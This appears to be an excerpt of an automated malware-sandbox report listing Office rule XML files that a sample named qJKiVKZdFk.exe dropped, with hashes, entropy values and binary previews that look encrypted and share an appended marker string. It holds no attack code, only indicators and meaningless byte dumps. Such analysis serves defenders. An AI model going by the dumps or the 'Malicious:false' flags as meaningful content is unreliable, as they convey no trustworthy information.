                                                                                                                                      Preview:<?xmlT[.&....q......9.(--..u`.t+ZQ\..p.N......z."38o...*.=2.f.[BB......)..N.*.Y....v+w..I......P.Y.r.&.5B...F.<N...H..G....G.:.#.)......|/g._.I'..H2.A........C{..l..u.hh.B..10...#...>.t.....?...].BJ$.X.2.u]....%......#,..S..#.sk.M....A.Z.....w...F.o.zn..z`/..$.L%....E`....5.{0.@............./...Yn..O......n.h.na.t..~[@.u.}.D.u.L..N.CTB..r....p.Lc..i.-...(E......>iB.A/..7.:..o'.D..z.g......s`...e.$..._.}s.dWM..Da.e0.D..8B%..s.....?9......<).@.NY5........4([...X;1.s.>.9D..Z.B.....ySw.}.....a9.f./>.;...w.6.(O....Gr..q...S....$.....|./...@..c..3.{.g...d...L.p...9S...`..yg.........4.(:nr3..hz....Y?.k...Q..j3EI..g{....w..}.7a.RTz...y.CGA......%...m....d..n...-...Q.3_^.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170135v4.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):987
                                                                                                                                      Entropy (8bit):7.767755354950888
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ZAL04gN8XwsDa3ZGCnV1EUkJHG2ewqtgfx8THRbD:ZSgqw1EfmpwPx2HBD
                                                                                                                                      MD5:B35444119D10DA8A37CD9C5713388E31
                                                                                                                                      SHA1:948A3B3F326B3A5764439C5113474CE3EBC65E34
                                                                                                                                      SHA-256:4DFB056CCB9C9C5E7439A6E3092B2B6A338451A6ED449829D2D0A6D3B5E7A216
                                                                                                                                      SHA-512:4A49B69EB8E46A5299353F9CD38D8016E9C338276269BEC5AEA7ECC63DA4D5102CB471D23A4DD15D2390EC379410A19F146ACECFE945E78ABBFECD6DB3F6FBBC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml(/._,.fm.ryb..@b......o..:...C.;..y_.T..kc$sX....w..U...3.}....#GrS...f(.........=..8$..I.~.Y...C.2M........_.J..3..V.B.$._....#...`,..~2E.'.hJ...V....~..O...)_...T8......C.K.....%M.}i.@9... );jqd.0t..1..2.hrsj.{.PrA/.._.O... ....02}..O.D..m.Z....=.9.....'L\....!;.....N..rk]......];.t.B..X..n...$....k.............z.M..^...kbOpD"..*.v8U:..].....z9.S..@.O.u.%Sc..(o.....B......)M.m. .=@b;..... ..N.2n.(c.S...j..8-..*..G.}%u.Wl...............4...%...F<.d/:...!=.Z...$AU.s^ ..)E..P'..R#........^.............R..M.i..2b....u/m...>4.^vPQ...B.P`.......k.BO..{mx........B'..XX..\..].;W...\...P...(..n.ov...3.E+....J7.V._..:4..F..U..q.H..&...?.Ow7.&.W...?.P.2.V.&..Q#.T...@f_.]..%..6...aE.A. .!..cfJz).=}?IOJ....(5-....l[..Fu#Z.{b.iA.Y.":b.E....P. ..c[..DJD.."K.k.V.9.L..j.].<ZC'2..6Nu.w3&.1|....Ww....@.}....l?....!4u...{>.E.{..]r|Q.....x..qO....i~....rK?.Y.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170136v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):996
                                                                                                                                      Entropy (8bit):7.7993733994567895
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:EhOvw/+Nuqa6/aPwyBYyTKQw8eGW3+EbWbD:CX/+NHaYCYoZeGW3wD
                                                                                                                                      MD5:0E6E006037E76A38CD0C139B58E00181
                                                                                                                                      SHA1:E67F56A2D1D9D26B729F80E8EEF9616C7200424B
                                                                                                                                      SHA-256:BD25770F4AC3D3F78FBF9F25EF79E198BF2F63B1B6FACC1CDB1128B613FCFBA7
                                                                                                                                      SHA-512:BE60250CD62BA50D14459493090ADA9AAB745605E6320C62968F25B70316E274A02610E21D64C2AB404DC3B9A69811A1006162C368D363606ECFC75E4C4459CD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.v2..................(.....{....D.1.fM....7-.PG.@.....&..M..<....Ox.........c{<....,..........G...\U..!@....g;*.F|u..@ c;....8m.\..........&.......x...G.]`.w....9Vw........:...#<F....Cg.HR.r..2..d($...;~j!...f>.....q.ZZ.R*6.i.s.IE'F.4.;.5Yj.../. (..-.....J.YV.~..1/H..&.+.:^...5.U.l.}1Q.l.s.a....?.vh6..[..<i....S...L..?....3F...dc......d.9.@..\+..Dr.P....X...-.y"{R....b)b.u..G...,..\<.?i1.f.K..Mcn...F.ok........Fg........:.[.................8_/.8.1....F..G;..y.....I.~......{m...WQ.x/v...%f....../..I[.....p...(R...O...wI..D........9S.>..B. j..g`.a.EZm$....:c.=*....g.......Q...F........]`.T........y.T...9.Boj..)...e.....S....H`r.(X(5...N.........k....C........[.C.+EhA..s}.:./.....]g..-..1..Q.aU.u.W..5..(....I.C.U|..s..$2..H.I..F...9.....4.u36j.9J.1T."..M.?u.S....G..I.=..0...C.)..|.$Ck.,).t.@N...I.m$I......P..$su...D?...i....d...CZu...(......Q..m...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170137v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):893
                                                                                                                                      Entropy (8bit):7.737159031468394
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Fkm7XNDvTo4KN7mxytZHnO3YDUbSRvDzbD:Fbs4WfZHON2tnD
                                                                                                                                      MD5:323F4831AD4F354965B651FF9522902B
                                                                                                                                      SHA1:CB6DC4068A4E5BBDF59CBF6F6C4055E7A798CFEA
                                                                                                                                      SHA-256:6C37C708111CA1BB170FCF39D8EC41C76AB992A218F0325F757CC92E616998DE
                                                                                                                                      SHA-512:11D16F0118F9B759B9DC7307B303D6B1707F37737082437AA5C0474CD2DD8A6361178C31A3D1CDE0AF3783CF9A7899B03690F123CED7038F6E591FB6207C6173
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.e-`8_q.[,.Yh.....c....]O.3.x.9./n..U..."..a...1..rRhL-**j..g....-*..G.d,h...#"...E.$...0..c...>p..F.k.i7.7...gh.Du?,.<...p.&.ra:..a.y.I...Q..Q..*.2h.Y`.V..I.9u..a..cE.B...f.'h.....!x!M..o.g.D.R..$0..^.9|Pp..l@r.$.'...b..z..Uj_.'....*......<f.S.,K.w.x..".Y.......l.4.v....P........$..I".#.8..../.uHk....3..[...*........G$.`.WW+.7..VS.2..C.C..<.7]n.".oM.....HL...R..O...Tk.Y...sn.......,.."...r~..&k...1..wN...ZZ.Q...3.O].h..9.%..?_..<....C7...>A,e,..$->..G.!.....6k..n..H..-.....PM4j..........o.1yR..g.a.;.4lt...C.p.g..E..Y.._.x..E..t.I.?..ch.9A..v@.=...<H.j..hd.J&!......*.2..\...4.P.......g...*.t..#.t...eC....O........lM-.....q.(...=.:..K..q...4A.Q.h.2...xW.o.......5y$.X=.ME~.Y(..8\..".....Sq...O..;.Z..k.z..nMq.X..:.W5..dm......%FP...l..9.7u.9y.._..A..G.9..m..y..)..gtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170138v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):799
                                                                                                                                      Entropy (8bit):7.747316104969387
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:8rqwfRKG7v82xJjjJaPZaI3ySJUxw1vjwWwXnmSMRmvwqYdHIA+rGY+ukIcii9a:dcKKv9tda0gGx4LxwXnmSn4FIhdbD
                                                                                                                                      MD5:59110C9CA7B0D5F8AB9D96449EF5BCE9
                                                                                                                                      SHA1:BED75C4D280C94CE8976F3FEC3A1C766FC663F44
                                                                                                                                      SHA-256:122A6944BAB3ABD28CA42CB66CE3FC599584E453AABE083D8ECC6A3AD43A8661
                                                                                                                                      SHA-512:2CB1D7E05226487FF3A9B287AD1F265E22F50AB40B899C23DB8F0BD6F0BA7E68120875CA6C89B54DC63EE0BFE417309450DDD6E6488CC73CDBB955F4C444931F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..).Wct..`-.....c6.[...6..3J...9N.sG..4..x.k..dv...p.].....9......A..>.P.].X...5.$.d.R..K../.....d..= .}...p.u....2.~b...w..n_#h.[.?h.d.C..W(O..F.....C.-.-%.=......(..`..."..R&;..&dNy..Nc.....K..a.B..tN.LYM.....<au(..}.7v...0j......Ap.\..VQ....W.,..&..k.....^@f"I"..&d.c.<D\.i...Ie.5....jR.g.........b...n1....i.!.._A.+.?...{&.....\+.Z..M.5K..u...Sb8..#.6q.....K".v|.s.e.L...V.m.?V>8.x%..3W....`4=...2.V.9l...:..^#.,bsoW.}_.6A..O......G...C..g....<.....{..3+.D{a..(... ...4.'M#o.tc|........Rd-G3l.+%.w>FFff..Yt7^'G}.....V.g..B..+|.`Q..D...7."E...On..6m.(.u.d.+.R.@8..I..vYj.,.. .x.u..>(...}...y.=c<.1..eZ.58......-Vs..H..,.=.;2M...{..r.A.LW...4$kc..&....N\.dK;..;/F...$.....DUs.Ptp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170139v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):801
                                                                                                                                      Entropy (8bit):7.725627002583308
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:dxUe79wNl1TY4J9BucZnzZET5sL+ugJw2tVIN+tRQh0EYkLpWqAjx6Wc0t3KukIX:dj7G1fxC53umi+tR0YiY3bD
                                                                                                                                      MD5:C2455B431A18D1F25D601811C0E2489F
                                                                                                                                      SHA1:D944CF8310D1DFED4A30F1B6CD04337696BACB73
                                                                                                                                      SHA-256:C120679E791F70691668992106CFB4A831DEAECF1DF96A47988AB2C9C252D945
                                                                                                                                      SHA-512:70F24734493437598A44B0CD5ED871EF2BEB363A3E5EEFFA8A2A6D06CC866DE94B274C9C7CB62787668FBAF798759B49B972F9D56230063F398F54CC3278FCDA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.pH.H......U.....&.[.(....kh..s..e.m.G.F.....'...j..."hT......I.....>O{a.8.0t...H:S.e...WG.........G8.-28....O.'...VC.p]g...f..m....j;|..C8."...x..'X..O./._".n.]......v.. >W.z..2}v..c.m.@...WfQg.V..>+. H..v..D......:]....&.o.*.GI.9.a........Q....x....f..4.p.R.C...q.?C....A....d;....r`7^.._.MBk...7.D [.D.;...\.8..G.m....sw..V%..*+#...E 3Oo.3...M..l..G.l....J....q.5.8.D.QQ...`...}.e.c."..tjmL<..qy...#i.1s3.......*..=%.P;O.....E.}R..>....8...p....t~.t....@$...H.6Y.k.p.!..Va...fH.aB......H.........}T8=s.`.IvR..........V...d....u.....>^.x...eo..g../.....e.y.8.K|~.}....._\......C....R..b.d.R.ab3m..3...r/Xc[imi.......+7.r..Df..Fe.....8m<.....)T..v.............MX.uq...'.U....J..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170140v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):801
                                                                                                                                      Entropy (8bit):7.677541157474245
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Hbhf4bvFUq3XhtEA7hvTNCxsH+KhiM2QhioYYne5kbbD:+9KohLAxseKhiMzbje5WD
                                                                                                                                      MD5:E857781147ED32A4F287E2799DD23613
                                                                                                                                      SHA1:CA403CD2548EB3D602028C386CB5E85EE326CEDA
                                                                                                                                      SHA-256:45F4BFFD356161102FB870757A53951521882BE7B7E66FA7A47BCA626C0A139F
                                                                                                                                      SHA-512:57372176A2FD0C47685839BF2B769F0B4B8D15C2E707898E6AD454D68E6821A5B8C85D31EF37F12D4E3667C7C4265E0D92041199374B52EF93FA1C8835A691B2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.......8$H....!Z.C!u>1.y.......V..!u..B.^..BOP..5.V]>w..C3oV/B..d<.S...c..6.OK......V.\N"dI......y,.V.KpXJ=.l.B.T.]u..?&...!.p...QL.N.]f....@.fN..'`..;=n...[..'.k..R@Ux.j0..d..g....!5....=r..8Lu..VaB.z.7..).C\G.T.|U5@. ..........:.Hl...c.ksgV6..q#.........p.o.........0..;...'....!=.n.. W....B[z@.a.MF.d.gMM'.M.._.....].R....."xcR.{..ubE..&k.w..Xp..Mv..... .&d....a.7.../+A.Gg..E1.....CY.G..?.p.d./. .4.g.M3..o..H."..=..a.....,..GI...'.....t....J.X.}....VQ.-0....9...co/`..V..(s......s.a..Ih ....).. ..u...7.......S0Ms...p..y..C=.`Z.zP..m-Avz.7q..dJ.&..m.p..{z=M..0..a.f2.0v..i.....f...'O......+7...s..o...r....}.cA."5..k.w.(@.}...>.....<.O......<..1#..)CO....iK....M.]...$.......u.|...A.&.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170141v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1029
                                                                                                                                      Entropy (8bit):7.798828556331074
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:gAbLzOAAj0JfnVgZuX0LTRTia+TKxheIYm7CZLbD:gYzx4KV8OmsKxhDYm7wvD
                                                                                                                                      MD5:8E3BC22E2CE61656CAC58A1DF43E4B2D
                                                                                                                                      SHA1:3566E7CE711A87290E64811720D920830D978545
                                                                                                                                      SHA-256:F83A3AC66E9ED2D1EE7FE691D8B5E7C856643B7F221272D6DF1F5C2C83A2AE70
                                                                                                                                      SHA-512:C6CCF897905638253762728087E514151907D4E1851BB375D5449443665852C14BFC787E34FFB1A92B9E24B79DCCBDC1D565C2B4628849338B67CE894C97F09C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml]?.....<.yBc....O$l......q`....I....8A...r=n....".3.%..s..ud...s.`...........D+.Y[.....$.\...q.q.|...Y...y.T[..l.r..N|\... .gg...fC5.W....0 ..Z.%....{.....'..O.....AN..t..3i....nU.s2....:0..!2.C1.._F.O!..+.+.~.y..J.Us;..SL}..f $.$...[U.[......`.A...X6Q.<Q..8/S....'....b......H...O.&Db......Z...s.f....~.G..S...$..4.......Qsi.......#.*3.G.d..j.......~..n.u..^..,.WP".+.{a.D!#I../m..O.Y.HA.....#..!.x..\d.......$.y3..I.r...i/...;..[.{...D.1:..|NC.....'..oR).j.zP.Q|..&..n.l5...l.ws..q...O........$.Z(.....{..h......z..2,...SA..x.O.HH.n.......u......H..>.dNs..Rn(e/.7.C.n.....T}Zg..^.L..P.p...WW......O5f%...0.|..A.N.b.m...hS....4.~]}.n.&..y......:U7.'HL...&....&..x.%/.f.k....2N .w=&...M.4:... .F.K......H...k.P..?...7 .I.._..p.u.p...Hp....l....0.. .n.5*...I.d...KZ....!...lQ...A...z.&.!>9.~"yM.u.K.....>...W/... .B.:..a.....~4..h.a../J.t{./_hzz...j[...^..t...#Bh..[Y..["..8RC.'.l.5C.B...YN..`s...k@..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170142v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):871
                                                                                                                                      Entropy (8bit):7.752567901917921
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7eqTkvlFEqz7btVNl5b10taIDmoqKxh5JfrzyKYuYwbD:7GvlFEqfTNjb10taIMA/dBYuYqD
                                                                                                                                      MD5:40619D169F1245C2C38A34B0BC95A3A3
                                                                                                                                      SHA1:5BE796A6C354912093C97C429770A3A41C2F903F
                                                                                                                                      SHA-256:F19BF5FDAE19C6BFD75987571E98209E5C467C8CE29F85DFC37919BDDD43F1DD
                                                                                                                                      SHA-512:FD79673F97CAE9A9018538AD0CF86BBF910DD757512002DE87749323A26B2D5617F77C5343BD3B580AD157D6905AA8D7EE6A0931B4F402031F269D866E3389E2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlZ...>SfU.Q....F7.....C..)C/d...FTx.x...L.....M...U*Y.5...V.hvy.E....n...{..g.[^*..Z.. .t..R.H.@..a....W.C.....a7.U...O]S.gY....2h..g..4,.{a..j..i..B....N..VP..v.#..9b...c..QN......,.....|?...v.M0m..8p....Z....e...tp....../.*N.g..Q....XM.mf.........#..JP[......OQxw.._......@..%.;..A....|K..A>..'.Y..N.............y.7t..xF.........s.~..AY..%+#.....{.I.S+j...E....T. ......x.V....<g. ..e........w..._.......n./.k;<.O.w._...."(....../...W..u..... s...2m.}.M\........u...-u.>H.....G...X.L...pVv4.6..5;G.b..m..%u....NE.Z...|.K..".....u.....t......g,..V..k.R.+..T.......>....aW.s.0..!..B.?....h...L...t_p.f..!...)w.Xf.....ci.!.M........s....tO..j....aBSz..o..s.S.'...<.f.A....{.......|.%H.DL..@..w..5.N..{....YL......n}..6N.+.Y|q..,...Z..RLu...Q....@...Z.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180003v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2217
                                                                                                                                      Entropy (8bit):7.9016017263484555
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:7qe/EpqvZ2Ch0r2MatPi0uwKKk9PlrvVl0R9tXmV3ZtKJb82NlfAD:72p62Ch0aM+KKkhlrVaz6F2Xfc
                                                                                                                                      MD5:4128D39C9C099F0AD889CA434C5CA5B6
                                                                                                                                      SHA1:0979D035DFB9BC9F487DC62F4272578910637C4E
                                                                                                                                      SHA-256:39FE524901B2B1FBB7FCAF77CFD3FE2FAC5C059E762C526047E3F7F1DD4FB6F8
                                                                                                                                      SHA-512:358FCDE836B4C1661C74B45BCBCA22B108588399143DC9FDAA56AF66757F9D13CC88A746D048BB798A92EE42BE816C86987745CC5DA3BCC5EE20618E7DB1F7FE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.p..6.8.`..N4..9.....W8A...of..~.../.\..<].Ki..@#.|.,....4o..._..X...'....P...}...ne.e@.K.X.j...'.b.@.B.L|......O.#...\... +..(.~I.<~...l.P.....8....M.{d..-.'Q....h.J./ZJw..Gv...h'.3..XX<C.}..}.<..fF_.nF.......-.&.....t.z...'...._.Q.F......0Q.P.U#O.....kb|..-}n.s-.....)..f..7.a.*.S....E.\.{....t.}.k...+...1...B..@......o.7d..7....U..9......%....;I.;....ah....0.W..i...a.[s,c._.QtE...!]C[...>..E....G..-lxfKDD\,..W. I.Z.S..cq..H.A..}s...S..k.g.Af.`1....G({.F.....H..~U..M.7...4[O.fm."...w.*.1...K....=),}.o..00.Q..Y....X.....6.M..Z......".F....\D.Nl...w.[...(D..GoH..uN....6....b...H...6...+..T.Q.A..M..%XR...~.g...T..j..K...7}........Z......I.....|. `.v..H|.......".;s......).\.q.......(f.L.q...../4..Ps......p.....[M........."..{..2.-..ZO...Ip]..|..1.Z.~ap..]xV..tx5..1X..~@I.b..Q.v....>K.V.oy...E......e....Ke.j&[IX.F.As._...Y..[g@..u.D!....h...}..8).L.i.ov.P....x<w..........}.9..,Vdb%.H.I9....kG...`..[...'3.....a-o...2M

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180026v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1987
                                                                                                                                      Entropy (8bit):7.916365699444166
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:INZDtpyr3UVVElloxgrcSovGPfIr8zmC7UvKXPZD/o9lC9D:IXarkwPjuvkfCsJQvEzbF
                                                                                                                                      MD5:90056B080A4B44D1AF045773066D2D55
                                                                                                                                      SHA1:1F7606C7ADD379ADA1CB1405A7A82C58C8B90740
                                                                                                                                      SHA-256:9A954740E079C1156AB9E7E3834EF32FC27C388B5D97F3E1454C7EC92F8CC861
                                                                                                                                      SHA-512:B97FEBA64EC6D97D984CC0D8D3A33FC0826FCD1AFA40640C8B8160DA85CF63EEC252FE8C8F5EA8395332C087F303B44377A7C9D3FFE930EDCA0B2CBA21621BA2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....%........Ws.LIL'.Z^.rq...Y....X..Lg..8...."n;xIC*a.s..Ydj...*.G..&.z]$V.......S.y:. .M...|..B....cM.E.!.....l....../....'.8pm.|g...v.......0.i..VV.Z.0&K@.\o..Zb=..j/0_.2...@.....4.....`.,.(.J....+._......<;.2.a..+F..*JN....=.P.`.6..v....W^=..g...u.Y...u.G..+.F.-b_".}Z....l.\0..0..q..6q........_1.1{......}@%0..x.A.........8.$Nd./.ja..A.2.0.x.Nq..P.i3.3.J.G......e......}.1.Y.w...$....Gy.u..G....6.{......62..*...'8..l5o.. ...x.Zs...g5..NI[9H.$...[...;.h..bm....>..M....w......,..i.J.3.W/...P..z{.|j.V.B..A.b.d..KS..r#4t.....s..yR......R...hF......52.J..bi#z.,..Lq......Gp+...w..n.......&.H.<..R...b.c....$!.^...i.y!....!.z.....R...p-8I .eF.Z..|.dz.^@...n.Q...m.....\#Jz.p.~..q....Z...|.h...-N......r`..U.")..`......s.?.....J........ ...X....E;l..."...8:......r4..v>Z8.=..._.........M..!.....V...-2C......L&=.{..8Y,..y4'.#..M..W...@.LG.}..\......jm.@..*.7........-.C..J.G..:.....s.W<.Z..^C$.A....[..D.w....Z...6....$O].].5.]..m.Wp.H

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180027v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3851
                                                                                                                                      Entropy (8bit):7.9552386904262935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:jA8ujBuMeFVauVjLRJz/TxWFkuGNsoy0cquL/Le:jAlVLUFPJzb8FkuoZy0ruL/S
                                                                                                                                      MD5:64E8359116EEC2518ADD22B0008A37BF
                                                                                                                                      SHA1:657E9FCE1D82D386B454791BA7CDF3153C83AF44
                                                                                                                                      SHA-256:554B8653BE656F926FEC67B52ECCC7DD8F715E184D2C79B333C34723C6E51687
                                                                                                                                      SHA-512:A4EE8CE641FFB2861EBF1BEF27A914D656612239EFC6856BF84BE1DD78FA25A0CF6DECDC6C0620E892590D68B5B3BACF15D979132A1B7BA3D073F4D6D7DFC60E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......m..W.A..O.....?.&..275:;]..U.....w^\...D...w.)...r..!...pD.w.D).*.[...4^.i.B...3...S<..s..~.Y..Z.M;...........{.Y"f.........k3....d.tb.2w....z.G..r..(......5Z|..S..0....\:...:...=;.`X+. .U...3.7.v..j..j.N........V}A........h,.H.&.[=8..9.l.7....aBI..~R....#...BW..1.i.n..X.w.;+......s.C...iA...Hp.J...~....Z]..dR....8z....=QkY......b.b.;.L./@.,....58..71..j>LR.z...wmO........\2..l..].l.Q.T.a..4.....d5Z..)4|....Y..{.M-....9._.&.....k~...i....Gk.0C..b.^I...H..F....!l..i{...c..4.....)z`.O."S....Fw..]x......#vQ.\....#.s...o.....s........... ....x....7A.8..\.....c6....%...m......W{.......h.6.O&.../.E.o. .I.._.c.>cKV.C...4...~.U.-.'........"....R.,.k..O..Kn0....R$._......./..j.YF....5..s......#..I...Q..a_.B7.\Nl..o..X!...?.k.9{r.U.||.Le.l..h*)>*.L~...P>H}.)%..tH....3..4..y...(...Ii......3..:.&...v.i1.]L.K..!.h.V.+g..H6..$h.C..+..d.[A._1h^.......m.dR3.z..n..f..i.j".O.c.S.Q.F..dZqE?.e..r...|]....S.Y[...m../.7....>.1QK..D...0....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180028v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3223
                                                                                                                                      Entropy (8bit):7.934084758837769
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Mc2kbrVxg1QPAsy69+wtaolYgE8tZRGm5v2NbzOtkRfbnIRcQCCi5RD:wkbrX5mmBRG/NnOkdnmcki5Z
                                                                                                                                      MD5:2E2FF46C0DD7A0E72882E1BA9A0AC6EC
                                                                                                                                      SHA1:55A8F4ADE7F7450C314FDF7F7BE38C30FDC784A8
                                                                                                                                      SHA-256:AE4570218767CA3D656BF52141A09131A235184DCE390D61F0301058F4C44D42
                                                                                                                                      SHA-512:29F505273B0F9AAC939FA2C53B95FAB7021CA239181545CB92487758D35A42628891A78B36348336D4D6333A80B81C4FC84D49A1C2419B08EE957006BA2783EC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml5....`.g..^.x1..........?.j3%....+...U.."..%.....n....%D..|[.......~.....jT..i.....=m..,y...n{........#..:.i.....gp]..........K...f9"..a.......2....c.:mI...Es..H1.0r.d.5........._#UI4...m.H.u@.....9.z..n.bG.........ku..t.DS.... .>h...C,....g.......T.O7.3._.}..-....6....... .B_...d.v...icw.vt......5.....F.W....*...;.C...J.....`...o...D...g..r...0nG.x...EU...W......'-.[...q..(...F...4z..v5SQl.kK......]`....C...H...U_....}t5..4.;.?.3S.5n{..lA$.wS........;".y'..I..5..&Q...e..o.J".Bo...N..(=....e...pX...\....@..&-..?......m.@l3.B...&...^...Q.RfdE%.....^$>..D.Y{..1k0....j.+...,W5...P..'....,j.D.....C.t.GK^B..n..(....X..m..e.re:.K%.qKr?..0.j.\.~......z4y.&u.MG.h.D...mtz..>.Q".......>5M}lZM.F.T.&.Wtd..Le.>.....e.Q...p~..M.sT.5.07.w...YX....Qcg.#RwX..%...^H.m...s...s......P.DQ...p.3H......:E.#.&..w9,.".'..o....!).r..9..hY5..W.......+U..*.I.Jr.Z........TFV.....R.b....v..1..dH..qqu.o.~i...u.^..6Q&Z...vB..b...(.I%|....R=.O.....KMH.Br.6....^.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180029v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1586
                                                                                                                                      Entropy (8bit):7.861836384424929
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:bxTBkBoT8vIJvEOCnDp5CdGU7VLA+E2+2lDTNgjA0mZEKqLfgD35T2aWJbD:bsmT/nCnV5C4UZLTE6NhfZ+gD358pD
                                                                                                                                      MD5:0CCEDA1000F42CBEB31285DC610B7E6D
                                                                                                                                      SHA1:FCCBE6BDE60A43D23BB992041E626D103DDDD44A
                                                                                                                                      SHA-256:A629E81E92BF4A3014161EA36A7CCE674A4329BA21E7864275C9C213526D20A9
                                                                                                                                      SHA-512:6497829A9D5D973A22DD32A0918D527618DBF950920AA26052F2DC35CF38778989F27F000C8E3C287C8FAA6A3969426F05882F5CEEBCC5D482E9246040F077BF
                                                                                                                                      Malicious:false
